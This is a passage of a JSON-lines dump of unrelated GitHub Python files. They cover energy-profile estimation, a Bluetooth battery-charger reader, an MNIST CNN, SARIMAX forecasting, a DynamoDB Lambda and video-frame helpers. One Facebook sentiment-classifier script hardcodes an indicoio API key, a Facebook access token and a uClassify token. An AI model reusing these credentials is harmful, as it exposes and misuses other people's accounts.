REProfileZone4(REProfile):\n climatic_zone = 4\n\n\nclass REProfileZone5(REProfile):\n climatic_zone = 5\n\n\nclass REProfileHydraulic(REProfile):\n @classmethod\n def get_range(cls, start, end):\n filename = path.join(path.dirname(path.realpath(__file__)), 'data/coefficients_HIDRO_RE.csv')\n df = pd.read_csv(filename)\n cofs = []\n while start <= end:\n month = cls.translate_month[start.month]\n coff_value = float(df[df['MES'] == month]['Factor de funcionamiento'])\n coff = Coefficent(start, {'A': coff_value})\n cofs.append(coff)\n start += relativedelta(hours=1)\n return cofs\n\n\nclass REProfileFlat(REProfile):\n flat_cof = 0.85\n @classmethod\n def get_range(cls, start, end):\n cofs = []\n while start <= end:\n cofs.append(Coefficent(start, {'A': cls.flat_cof}))\n start += relativedelta(hours=1)\n return cofs\n\n\nclass ProfileHour(namedtuple('ProfileHour', ['date', 'measure', 'valid', 'accumulated'])):\n\n __slots__ = ()\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __le__(self, other):\n return self.date <= other.date\n\n def __gt__(self, other):\n return self.date > other.date\n\n def __ge__(self, other):\n return self.date >= other.date\n\n\nclass Profile(object):\n \"\"\"A Profile object representing hours and consumption.\n \"\"\"\n\n def __init__(self, start, end, measures, accumulated=None, drag_by_periods=True):\n self.measures = measures[:]\n self.gaps = [] # Containing the gaps and invalid measures\n self.adjusted_periods = [] # If a period is adjusted\n self.start_date = start\n self.end_date = end\n self.profile_class = REEProfile\n\n assert type(drag_by_periods) == bool, \"drag_by_periods must be a Boolean\"\n self.drag_by_periods = drag_by_periods\n\n self.accumulated = Decimal(0)\n if accumulated:\n assert type(accumulated) == float or isinstance(accumulated, Decimal), \"Provided accumulated must be a Decimal or a float\"\n assert accumulated < 1 and accumulated > -1, \"Provided accumulated '{}' must be -1 < accumulated < 1\".format(accumulated)\n self.accumulated = accumulated\n\n measures_by_date = dict(\n [(m.date, m.measure) for m in measures if m.valid]\n )\n # End is included\n while start <= end:\n if measures_by_date.pop(TIMEZONE.normalize(start), None) is None:\n self.gaps.append(start)\n start += timedelta(hours=1)\n\n @property\n def n_hours(self):\n # End date is included, we have to sum one hour\n return int((self.end_date - self.start_date).total_seconds() / 3600) + 1\n\n @property\n def n_hours_measures(self):\n return len(self.measures)\n\n @property\n def total_consumption(self):\n return sum(x[1] for x in self.measures)\n\n @property\n def first_day_of_month(self):\n return self.end_date.day == 1 and self.end_date.hour > 0\n\n @staticmethod\n def simple_dragger(measures):\n dragger = Dragger()\n for idx, measure in enumerate(measures):\n values = measure._asdict()\n consumption = dragger.drag(measure.measure)\n values['measure'] = consumption\n measures[idx] = measure._replace(**values)\n return measures\n\n def get_hours_per_period(self, tariff, only_valid=False):\n assert isinstance(tariff, Tariff)\n hours_per_period = Counter()\n if only_valid:\n for m in self.measures:\n if m.valid:\n dt = m.date - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n hours_per_period[period.code] += 1\n else:\n start_idx = self.start_date\n end = self.end_date\n while start_idx <= end:\n dt = start_idx - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n hours_per_period[period.code] += 1\n start_idx += timedelta(hours=1)\n return hours_per_period\n\n def get_consumption_per_period(self, tariff):\n assert isinstance(tariff, Tariff)\n consumption_per_period = Counter()\n for period in tariff.energy_periods:\n consumption_per_period[period] = 0\n for m in self.measures:\n if m.valid:\n dt = m.date - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n consumption_per_period[period.code] += m.measure\n return consumption_per_period\n\n def get_estimable_hours(self, tariff):\n assert isinstance(tariff, Tariff)\n total_hours = self.get_hours_per_period(tariff)\n valid_hours = self.get_hours_per_period(tariff, only_valid=True)\n estimable_hours = {}\n for period in total_hours.keys():\n estimable_hours[period] = total_hours[period] - valid_hours[period]\n return estimable_hours\n\n def get_estimable_consumption(self, tariff, balance):\n assert isinstance(tariff, Tariff)\n consumption_per_period = self.get_consumption_per_period(tariff)\n estimable = {}\n for period in consumption_per_period:\n estimable[period] = balance[period] - consumption_per_period[period]\n return estimable\n\n def estimate(self, tariff, balance):\n assert isinstance(tariff, Tariff)\n logger.debug('Estimating for tariff: {0}'.format(\n tariff.code\n ))\n\n # Adapt balance for simplified T30A with just one period\n if isinstance(tariff, T30A_one_period) or isinstance(tariff, T31A_one_period):\n balance = {\n \"P1\": sum([values for values in balance.values()])\n }\n # Adapt T31A6P adding P4 to P1\n if isinstance(tariff, T31A) and balance.get('P4', 0) > 0:\n balance['P1'] += balance['P4']\n balance['P4'] = 0\n\n measures = [x for x in self.measures if x.valid]\n start = self.start_date\n end = self.end_date\n # - REE cofs get from (year/month)\n # - Simel cofs get from (year/month/day hour) - can't substract one day\n if self.first_day_of_month or not issubclass(self.profile_class,\n REEProfile):\n cofs = self.profile_class.get_range(start, end)\n else:\n cofs = self.profile_class.get_range(\n start, end - relativedelta(days=1)\n )\n cofs = Coefficients(cofs)\n cofs_per_period = Counter()\n\n for gap in self.gaps:\n dt = gap - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n gap_cof = cofs.get(dt)\n cofs_per_period[period.code] += gap_cof.cof[tariff.cof]\n\n logger.debug('Coefficients per period calculated: {0}'.format(\n cofs_per_period\n ))\n\n energy_per_period = self.get_estimable_consumption(tariff, balance)\n energy_per_period_rem = energy_per_period.copy()\n\n dragger = Dragger()\n\n # Initialize the Dragger with passed accumulated value\n if len(self.gaps) > 0:\n # Drag by_hours\n if not self.drag_by_periods:\n init_drag_key = \"default\"\n else:\n dt = self.gaps[0] - timedelta(minutes=1)\n init_drag_key = tariff.get_period_by_date(dt).code\n\n dragger.drag(self.accumulated, key=init_drag_key)\n\n for idx, gap in enumerate(self.gaps):\n logger.debug('Gap {0}/{1}'.format(\n idx + 1, len(self.gaps)\n ))\n dt = gap - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n\n drag_key = period.code if not self.drag_by_periods else \"default\"\n\n gap_cof = cofs.get(gap).cof[tariff.cof]\n energy = energy_per_period[period.code]\n # If the balance[period] < energy_profile[period] fill with 0\n if energy < 0:\n energy = 0\n\n try:\n gap_energy = (energy * gap_cof) / cofs_per_period[period.code]\n except ZeroDivisionError as error:\n gap_energy = 0\n logger.debug(error)\n\n aprox = dragger.drag(gap_energy, key=drag_key)\n energy_per_period_rem[period.code] -= gap_energy\n\n logger.debug(\n 'Energy for hour {0} is {1}. {2} Energy {3}/{4}'.format(\n gap, aprox, period.code,\n energy_per_period_rem[period.code], energy\n ))\n pos = bisect.bisect_left(measures, ProfileHour(gap, 0, True, 0.0))\n profile_hour = ProfileHour(TIMEZONE.normalize(gap), aprox, True, dragger[drag_key])\n\n measures.insert(pos, profile_hour)\n\n profile = Profile(self.start_date, self.end_date, measures)\n return profile\n\n def adjust(self, tariff, balance, diff=0):\n # Adjust values\n if self.gaps:\n raise Exception('Is not possible to adjust a profile with gaps')\n profile = Profile(self.start_date, self.end_date, self.measures)\n dragger = Dragger()\n energy_per_period = profile.get_consumption_per_period(tariff)\n for period_name, period_balance in balance.items():\n period_profile = energy_per_period[period_name]\n margin_bottom = period_balance - diff\n margin_top = period_balance + diff\n if not margin_bottom <= period_profile <= margin_top:\n profile.adjusted_periods.append(period_name)\n for idx, measure in enumerate(profile.measures):\n dt = measure.date - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt).code\n if period != period_name:\n continue\n values = measure._asdict()\n values['valid'] = True\n if not energy_per_period[period]:\n values['measure'] = dragger.drag(measure.measure * 0)\n else:\n values['measure'] = dragger.drag(measure.measure * (\n balance[period] / energy_per_period[period]\n ))\n profile.measures[idx] = measure._replace(**values)\n return profile\n\n def fixit(self, tariff, balance, diff=0):\n # Fill the gaps\n profile = self.estimate(tariff, balance)\n # Adjust to the balance\n profile = profile.adjust(tariff, balance, diff)\n\n if hasattr(tariff, 'low_voltage_measure') and getattr(tariff, 'low_voltage_measure'):\n # Apply losses on new 6.XTD flag_low and old 3.1A LB\n profile.measures = tariff.apply_curve_losses(profile.measures)\n profile.measures = self.simple_dragger(profile.measures)\n return profile\n\n def __repr__(self):\n return ''.format(\n self.start_date, self.end_date, self.n_hours, self.total_consumption\n )\n","repo_name":"gisce/enerdata","sub_path":"enerdata/profiles/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":26297,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"8699760184","text":"import asyncio\nimport sys\nfrom time import time\n\nfrom bleak import BleakClient\nimport pendulum\n\n\nclass MC3000Ble:\n \"\"\"\n SkyRC MC3000 charger BLE implementation (Bluetooth Low Energy).\n\n This code implements only reading status of slots.\n All decoding logic was extracted from Android SkyRC MC3000 apk.\n\n Specifically `com.skyrc.mc3000.thread.BleThread` together with `com.skyrc.mc3000.broadcast.actions.Config`\n contain also other functions like get/set parameters, start/stop control, ... I didn't implement those\n since I'm interested only in slots readout to monitor progress. Android code is quite readable,\n nearly all logic is contained in classes.dex and jadx-gui does good job on decompiling.\n \"\"\"\n\n SERVICE_UUID = \"0000ffe0-0000-1000-8000-00805f9b34fb\"\n CHARACTERISTIC_UUID = \"0000ffe1-0000-1000-8000-00805f9b34fb\"\n\n BATTERY_INFO = 85\n\n types = {0: \"LiIon\", 1: \"LiFe\", 2: \"LiIo4_35\", 3: \"NiMH\", 4: \"NiCd\", 5: \"NiZn\", 6: \"Eneloop\", 7: \"Ram\", 8: \"Batlto\"}\n modes = {\n 0: {0: \"charge\", 1: \"refresh\", 2: \"storage\", 3: \"discharge\", 4: \"cycle\"},\n 1: {0: \"charge\", 1: \"refresh\", 2: \"discharge\", 3: \"cycle\"},\n 2: {0: \"charge\", 1: \"refresh\", 2: \"break in\", 3: \"discharge\", 4: \"cycle\"},\n }\n modes_types_mapping = {\n # mode_index: [type_index, type_index, ...]\n 0: [0, 1, 2, 8],\n 1: [5, 7],\n 2: [3, 4, 6],\n }\n statuses = {\n 0: \"standby\",\n 1: \"charge\",\n 2: \"discharge\",\n 3: \"pause\",\n 4: \"completed\",\n 128: \"input low voltage\",\n 129: \"input high voltage\",\n 130: \"ADC MCP3424-1 error\",\n 131: \"ADC MCP3424-2 error\",\n 132: \"connection brake\",\n 133: \"check voltage\",\n 134: \"capacity limit reached\",\n 135: \"time limit reached\",\n 136: \"system over temperature\",\n 137: \"battery over temperature\",\n 138: \"short circuit\",\n 139: \"wrong polarity\",\n }\n\n def __init__(self, ble_address, interval=1):\n self.ble_address = ble_address\n self.interval = interval\n self.running = False\n self.receive_callback = None\n\n def run(self, receive_callback):\n self.running = True\n self.receive_callback = receive_callback\n asyncio.run(self._loop_async())\n\n def stop(self):\n self.running = False\n\n async def _loop_async(self):\n interval = float(self.interval)\n begin = time()\n async with BleakClient(self.ble_address) as client:\n await client.start_notify(self.CHARACTERISTIC_UUID, self._async_callback)\n\n while self.running:\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(0))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(1))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(2))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(3))\n await asyncio.sleep(interval - ((time() - begin) % interval))\n\n await client.stop_notify(self.CHARACTERISTIC_UUID)\n\n async def _async_callback(self, sender, data):\n if data[1] == self.BATTERY_INFO:\n battery_info = self.parse_battery_info(data)\n if self.receive_callback:\n callback = self.receive_callback\n callback(battery_info)\n\n def parse_battery_info(self, data):\n battery_info = {\n \"slot\": data[2],\n }\n\n type = data[3] & 255\n battery_info[\"type\"] = self.types[type] if type in self.types else \"unknown\"\n\n available_modes = None\n for mode_group, applicable_types in self.modes_types_mapping.items():\n if type in applicable_types:\n available_modes = self.modes[mode_group]\n break\n\n mode = data[4] & 255\n battery_info[\"mode\"] = available_modes[mode] if mode in available_modes else \"unknown\"\n battery_info[\"count\"] = data[5] & 255\n\n status = data[6] & 255\n battery_info[\"status\"] = self.statuses[status] if status in self.statuses else \"unknown error\"\n\n seconds = ((data[7] & 255) * 256) + (data[8] & 255)\n battery_info[\"time\"] = pendulum.duration(seconds=seconds)\n\n battery_info[\"voltage\"] = (((data[9] & 255) * 256) + (data[10] & 255)) / 1000\n battery_info[\"current\"] = (((data[11] & 255) * 256) + (data[12] & 255)) / 1000\n battery_info[\"capacity\"] = (((data[13] & 255) * 256) + (data[14] & 255))\n battery_info[\"temperature\"] = data[15] & 255\n\n resistance = ((data[16] & 255) * 256) + (data[17] & 255)\n battery_info[\"resistance\"] = \"n/a\" if resistance in [0, 1, 65535] else resistance\n\n led = data[18] & 255\n battery_info[\"led\"] = self.resolve_led_color(led, battery_info[\"slot\"])\n return battery_info\n\n def resolve_led_color(self, value, slot_index):\n def get_bit_value(bit):\n return (value >> bit) & 1\n\n if get_bit_value(slot_index):\n return \"red\"\n if get_bit_value(slot_index + 4):\n return \"green\"\n return \"none\"\n\n def get_channel_request_data(self, channel_index):\n payload = [15, self.BATTERY_INFO, channel_index, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n self.fill_checksum(payload)\n return bytearray(payload)\n\n def fill_checksum(self, payload):\n sum = 0\n for byte in payload:\n sum += byte\n payload[-1] = sum & 255\n\n\nclass DebugPrint:\n buffer = {}\n\n def __init__(self, ble_address):\n self.service = MC3000Ble(ble_address=ble_address, interval=3)\n\n def run(self):\n self.service.run(self.receive_callback)\n\n def receive_callback(self, battery_info):\n slot = battery_info[\"slot\"]\n self.buffer[slot] = battery_info\n if slot == 3 and len(self.buffer) == 4:\n for battery_info in self.buffer.values():\n print(battery_info)\n print()\n\n\nif __name__ == \"__main__\":\n try:\n DebugPrint(ble_address=sys.argv[1]).run()\n except KeyboardInterrupt:\n exit(1)\n","repo_name":"kolinger/skyrc-mc3000","sub_path":"mc3000ble.py","file_name":"mc3000ble.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"14801347366","text":"#PF-Assgn-56\n\ndef max_frequency_word_counter(data):\n word=\"\"\n frequency=0\n new1={}\n word_list=[]\n new_text=data.upper().split()\n \n for i in new_text:\n count=new_text.count(i)\n new1[i]=count\n \n \n value=list(new1.values())\n value.sort(reverse=True)\n key=list(new1.keys())\n \n frequency=value[0]\n for i in new1:\n if new1[i]==frequency:\n word_list.append(i)\n word=word_list[0]\n for i in range(1,len(word_list)):\n if len(word_list[i])>len(word):\n word=word_list[i]\n print(word,frequency)\n \n#Provide different values for data and test your program.\ndata=\"Listen to the big clock Tick tock tick\" \nmax_frequency_word_counter(data)","repo_name":"Shweta2013/InfyTQ-Exercises-And-Assignments","sub_path":"PROGRAMMING FUNDAMENTALS USING PYTHON/Day 8/#PF-Assgn-56.py","file_name":"#PF-Assgn-56.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5732413173","text":"import numpy as np\nimport scipy as sp\nimport matplotlib as plt\nimport json\nimport requests\nimport facebook\nimport indicoio\nimport pickle\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\n\nindicoio.config.api_key = \"bca760a95d156cbbad4729cb9cd4cb0e\"\nmy_access_token = \"EAACEdEose0cBAIcqBq4yCC1WZCEKiNGnzH4dZAv8PDKJS6kMH5VctNTGT2wwqMQZBmwmGlak03aZATBHcNwZBCX8KqH0CX6J11ZCCKocomKfFpezjX9ifj3lB0i8aeZApjMnHlEIkiIWdPiyV2TlKbw2rr33U6SibOKoPWiksawmgZDZD\"\n\nusers = [\"ladygaga\", \"leonardodicaprio\"]\nclf = [LogisticRegression(), LogisticRegression(), LogisticRegression()]\nfor i in range(0, len(clf)):\n graph = facebook.GraphAPI(access_token=my_access_token, version='2.6')\n posts = graph.get_object(\"/\" + users[i] + \"/\" + 'posts', limit=100)\n factorization_matrix = np.zeros(shape=[111, len(posts[\"data\"])])\n matrix_classes = np.zeros(shape=[1, len(posts[\"data\"])])\n for j in range(0, len(posts[\"data\"])):\n if 'message' in posts[\"data\"][j]:\n item = posts[\"data\"][j]\n payload = {'texts': [item[\"message\"]]}\n response = requests.post(\"https://api.uclassify.com/v1/uClassify/Sentiment/classify\",\n data=json.dumps(payload), headers={'Authorization': 'Token JbHwzZBLH1ke'})\n prediction = response.json()[0]\n text_tags = indicoio.text_tags(item[\"message\"], version=2)\n predicted_class = 0\n if prediction[\"classification\"][0][\"p\"] > prediction[\"classification\"][1][\"p\"]:\n predicted_class = 0\n else:\n predicted_class = 1\n\n matrix_classes[:, j] = predicted_class\n factorization_matrix[:, j] = list(text_tags.values())\n\n X_train, X_test, y_train, y_test = train_test_split(factorization_matrix.T, matrix_classes.T, test_size=0.2)\n clf[i].fit_transform(X_train, y_train)\n y_predict = clf[i].predict(X_test)\n print(\"Y_test shape = \", y_test.shape)\n print(\"Y_preidct shape = \", y_predict.shape)\n\n true_positives = 0\n for k in range(0, len(y_test)):\n if y_test[k] == y_predict[k]:\n true_positives += 1\n\n print(\"Accuracy = \", true_positives / y_test.shape[0])\n\n with open(\"classifier\" + str(i) + \".pickle\", \"wb\") as output_file:\n pickle.dump(clf[i], output_file)\n\n","repo_name":"nikola-miljkovic/citizen-reporter","sub_path":"Predictions/preference_prediction.py","file_name":"preference_prediction.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42876651408","text":"\"\"\" test modules \"\"\"\n\nimport sys\nfrom types import ModuleType\nfrom typing import Any, Dict, List, Optional\n\nfrom loguru import logger\n\n\nfrom . import (\n codeowners, # noqa: F401\n dependabot, # noqa: F401\n docs, # noqa: F401\n generic, # noqa: F401\n github_actions, # noqa: F401\n homebrew, # noqa: F401\n issues, # noqa: F401\n mkdocs, # noqa: F401\n # pylintrc,\n pyproject, # noqa: F401\n security_md, # noqa: F401\n terraform, # noqa: F401\n)\n\nCATEGORY = \"tests\"\nLANGUAGES = [\"all\"]\nDEFAULT_CONFIG: Dict[str, Any] = {}\n\n\ndef load_modules(module_allowlist: Optional[List[str]] = None) -> Dict[str, ModuleType]:\n \"\"\"loads the modules\"\"\"\n module_list: Dict[str, Any] = {}\n\n for module in sys.modules:\n if module.startswith(__name__) and len(module.split(\".\")) == 3:\n # skip them if we're filtering by module\n if module_allowlist and module not in module_allowlist:\n continue\n\n if hasattr(sys.modules[module], \"CATEGORY\") and module.startswith(__name__):\n # logger.debug(\"Adding module: {}\", module)\n module_name = module.replace(f\"{__name__}.\", \"\")\n module_list[module_name] = sys.modules[module]\n else:\n logger.warning(\"Module {} doesn't have a CATEGORY attribute.\", module)\n\n if not hasattr(sys.modules[module], \"DEFAULT_CONFIG\"):\n logger.warning(\n \"Module {} doesn't have a DEFAULT_CONFIG attribute, weirdness may occur.\",\n module,\n )\n if not hasattr(sys.modules[module], \"LANGUAGES\"):\n logger.warning(\n \"Module {} doesn't have a LANGUAGES attribute, weirdness may occur.\",\n module,\n )\n return module_list\n\n\nMODULES = load_modules()\n","repo_name":"yaleman/github_linter","sub_path":"github_linter/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23450996631","text":"from sys import argv\n\n# T = 4\n\n# shy = [\"4 11111\",\n# \"1 09\",\n# \"5 110011\",\n# \"0 1\"]\n\nifile = open(argv[1], \"rU\")\nofile = open(argv[2], \"w\")\n\nT = int(ifile.readline())\n\nfor case in xrange(1, T+1):\n\n # max_shy, aud = shy[case-1].split()\n\n max_shy, aud = ifile.readline().split()\n max_shy = int(max_shy)\n aud = [int(c) for c in aud]\n\n count = 0\n invite = 0\n for a in xrange(len(aud)):\n if count + invite < a and aud[a] > 0:\n invite += a - (count + invite)\n count += aud[a]\n\n if case < 5:\n print(\"Case #{}: {} for {}\".format(case, invite, aud))\n ofile.write(\"Case #{}: {}\\n\".format(case, invite))\n\nofile.close()\nifile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2086.py","file_name":"2086.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11840313660","text":"import numpy as np\r\nimport pandas as pd\r\nimport keras\r\nfrom keras.utils import np_utils\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\r\nimport cv2\r\nimport os\r\n\r\n\r\n\r\n(x_Train,y_Train),(x_Test,y_Test)=keras.datasets.mnist.load_data()\r\n# X=sample Y=label\r\nprint('x_Train_img',x_Train.shape)\r\nprint('y_Train_img',y_Train.shape)\r\n\r\nprint('x_Test_img',x_Test.shape)\r\nprint('y_Test_img',y_Test.shape)\r\n\r\n# 將RGB3維轉成一維\r\nprint(x_Train.shape)\r\nx_Train4D=x_Train.reshape(x_Train.shape[0],28,28,1).astype('float32')\r\nx_Test4D=x_Test.reshape(x_Test.shape[0],28,28,1).astype('float32')\r\nprint('x_Train4D.shape ',x_Train4D.shape)\r\nprint('x_Test4D.shape ',x_Test4D.shape)\r\n\r\n# 將資料正規畫到0~1之間\r\nx_Train4D_nor=x_Train4D/255\r\nx_Test4D_nor=x_Test4D/255\r\n\r\n# 重新編碼ONEHOT\r\ny_Train_onehot=np_utils.to_categorical(y_Train)\r\ny_Test_onehot=np_utils.to_categorical(y_Test)\r\nprint(y_Train_onehot.shape)\r\n\r\n\r\n# # CNN model\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters=16,kernel_size=(5,5),padding='same',input_shape=(28,28,1),activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Conv2D(filters=36,kernel_size=(5,5),padding='same',activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10,activation='softmax'))\r\nmodel.summary()\r\n\r\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\r\ntrain_history=model.fit(x=x_Train4D_nor,y=y_Train_onehot,validation_split=0.2,epochs=2,batch_size=300,verbose=2)\r\npredictions = model.predict_classes(x_Test4D_nor)\r\nprint(len(predictions))\r\npd.crosstab(y_Test,predictions,rownames=['實際值'],colnames=['預測值'])\r\n","repo_name":"Raywang0211/CNN","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18095107103","text":"from statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.arima.model import ARIMA\nimport module.constants as const\nimport module.util_functions as utf\nimport datetime\nimport time\nimport numpy as np\nimport pandas as pd\n\nclass SARIMAX_Model:\n \n def __init__(self, p=0, q=0, P=0, Q=0, diff_order=0, transform='', model_type='SARIMA'):\n self.ar_order = p # set autoregressive order\n self.ma_order = q # set moving average order\n self.diff_order = diff_order # set difference order\n self.P = P # set AR order for seasonal component\n self.Q = Q # set MA order for seasonal component\n self.m = 52 # set number of time periods in a year\n self.model_type = model_type # model type: ARIMA or SARIMA\n self.transform_method = transform # set transformation method\n \n # set labels\n self.observe_label = const.STORE_OBSERVE # set observe label\n self.target = const.TARGET.get(transform) # set label for target variable based on transform method\n self.forecast_label = self.model_type + ' Forecast'\n self.forecast_train_label = self.model_type + ' Train'\n self.forecast_test_label = self.model_type + ' Test'\n \n # set model's name\n if model_type == 'SARIMA':\n self.model_name = model_type + '(' + str(p) + ', ' + str(diff_order) + ', ' + str(q) + ')(' + \\\n str(P) + ', 0,' + str(Q) + ')[' + str(self.m) + ']' \n else: # ARIMA model\n self.model_name = model_type + '(' + str(p) + ', ' + str(diff_order) + ', ' + str(q) + ')'\n \n def fit(self, X_train, Y_train):\n '''\n Train SARIMAX model and make in-sample forecasts.\n \n Parms:\n - X_train: SVD components\n - Y_train: train dataframe\n '''\n \n # record start time\n start = time.process_time()\n \n # duplicate original data\n data = Y_train.copy()\n\n if self.model_type == 'SARIMA': # SARIMA + SVD components\n model = SARIMAX(data[self.target], exog=X_train,\n order=(self.ar_order, self.diff_order, self.ma_order),\n seasonal_order=(self.P, 0, self.Q, self.m),\n simple_differencing=False).fit(disp=False)\n else: # ARIMA + SVD components\n model = ARIMA(data[self.target], exog=X_train, \n order=(self.ar_order, self.diff_order, self.ma_order)).fit()\n \n # make in-sample forecast and compute forecast error\n data[self.forecast_train_label] = utf.inverse_transform(model.fittedvalues, self.transform_method)\n data[const.ERROR_LABEL] = data[self.observe_label] - data[self.forecast_train_label]\n \n # check if residuals are correlated\n self.residual_info = utf.check_residuals(data)\n \n # save data and model\n self.data = data\n self.model = model\n \n # record end time\n end = time.process_time()\n self.train_time = (end - start) * 10**3 # compute model's training time in milli-second\n \n def predict(self, X, n_periods=52, forecast_label=None):\n '''\n Forecast sales for next n periods.\n \n Parms:\n - X: SVD components\n - n_periods: number of future periods for making sales forecast\n - forecast_label: label for a variable that contains forecast values\n '''\n \n forecast_label = self.forecast_test_label if forecast_label == None else forecast_label # set forecast label\n future_dates = utf.get_future_dates(self.data.Date.iloc[-1], n_periods) # get dates for next n periods\n \n # make out-of-sample forecast\n forecast = self.model.get_prediction(start=self.data.shape[0], end=self.data.shape[0]+n_periods-1, exog=X) \n yhat = utf.inverse_transform(forecast.predicted_mean, self.transform_method)\n \n # get confidence intervals\n yhat_conf_int = forecast.conf_int(alpha=0.05)\n lower = utf.inverse_transform(yhat_conf_int['lower ' + self.target].values, self.transform_method)\n upper = utf.inverse_transform(yhat_conf_int['upper ' + self.target].values, self.transform_method)\n\n # create and return forecast data frame\n return pd.DataFrame({'Date': future_dates, forecast_label: yhat, 'Lower Bound': lower, 'Upper Bound': upper})","repo_name":"nphan20181/sales-forecast","sub_path":"module/sarima_model.py","file_name":"sarima_model.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34475784032","text":"import json\r\nimport boto3\r\nimport os\r\nimport sys\r\nimport pandas as pd\r\nfrom boto3.dynamodb.conditions import Key\r\n\r\n\r\n\r\ndef lambda_handler(event, context):\r\n\r\n year = event[\"year\"]\r\n start_date = event[\"start_date\"]\r\n end_date = event[\"end_date\"]\r\n \r\n table_name = 'weather_data'\r\n client = boto3.resource('dynamodb')\r\n table = client.Table(table_name)\r\n\r\n response = table.query(\r\n KeyConditionExpression=Key('year').eq(year)&Key('date').between(start_date, end_date)\r\n )\r\n items = response['Items']\r\n item_list = []\r\n for item in items:\r\n item_list.append(item)\r\n df = pd.DataFrame(item_list)\r\n local_file = '/tmp/climate_data_selected_result.xlsx'\r\n df.to_excel(local_file)\r\n s3 = boto3.client('s3')\r\n bucket_name = 'my-bucket-name'\r\n s3_file = 'climate_data_selected_result.xlsx'\r\n s3.upload_file(local_file, bucket_name, s3_file)","repo_name":"ericzheng050701/wcd_de_lab","sub_path":"NoSQL_DynamoDB/scripts/Lambda2_Dynamo2S3.py","file_name":"Lambda2_Dynamo2S3.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73138174593","text":"import os\nimport random\nimport threading\nimport time\nimport cv2\n\nfrom state_fusion.msg_sockets import socket_sender\nfrom datetime import datetime\n\ndef now_string():\n now=datetime.now()\n return now.strftime('%Y_%b_%d__%H:%M')\n\ndef cicle_list(l):\n \"\"\"\n Function that return the next element in list. At the end return the first element and then repeat\n :param l:\n :return:\n \"\"\"\n ind=0\n n=len(l)\n def temp():\n nonlocal ind\n val = l[ind]\n ind = (ind+1)%n\n return val\n return temp\n\n\ndef open_img(folder,path):\n format_name = lambda x: x.split('.')[0]\n path_full = os.path.join(folder,path)\n out = cv2.imread(path_full,cv2.IMREAD_COLOR)\n return format_name(path),out\n\n\ndef random_img_from_folder(folder_path):\n lt = os.listdir(folder_path)\n random.shuffle(lt)\n fun_iter_folder = cicle_list(list(lt))\n feed_function = lambda: open_img(folder_path, fun_iter_folder())\n return feed_function\n\ndef video_feed_realtime(video_path,frame_start=0):\n\n cap = None\n st=time.time()\n fps=40\n def retrieve_frame():\n nonlocal cap\n if cap is None:\n cap = cv2.VideoCapture(video_path)\n if frame_start != 0:\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame_start)\n\n now = frame_start+(time.time()-st)*fps\n success_set = cap.set(cv2.CAP_PROP_POS_FRAMES, int(now))\n success_grab = cap.grab()\n if success_set and success_grab:\n flag, frame = cap.retrieve()\n cf = cap.get(cv2.CAP_PROP_POS_FRAMES)\n out_name = '{0}_-1'.format(cf)\n return out_name,frame\n\n else:\n return None,None\n\n\n return retrieve_frame\n\ndef video_feed(video_path,frame_start=0):\n\n cap = None\n\n def retrieve_frame(): \n nonlocal cap\n if cap is None:\n cap = cv2.VideoCapture(video_path)\n if frame_start != 0:\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame_start)\n\n success = cap.grab()\n\n if success:\n flag, frame = cap.retrieve()\n cf = cap.get(cv2.CAP_PROP_POS_FRAMES)\n out_name = '{0}_-1'.format(cf)\n return out_name,frame\n\n else:\n return None,None\n\n\n return retrieve_frame\n\n\ndef calc_port():\n \"\"\"\n Calc a port 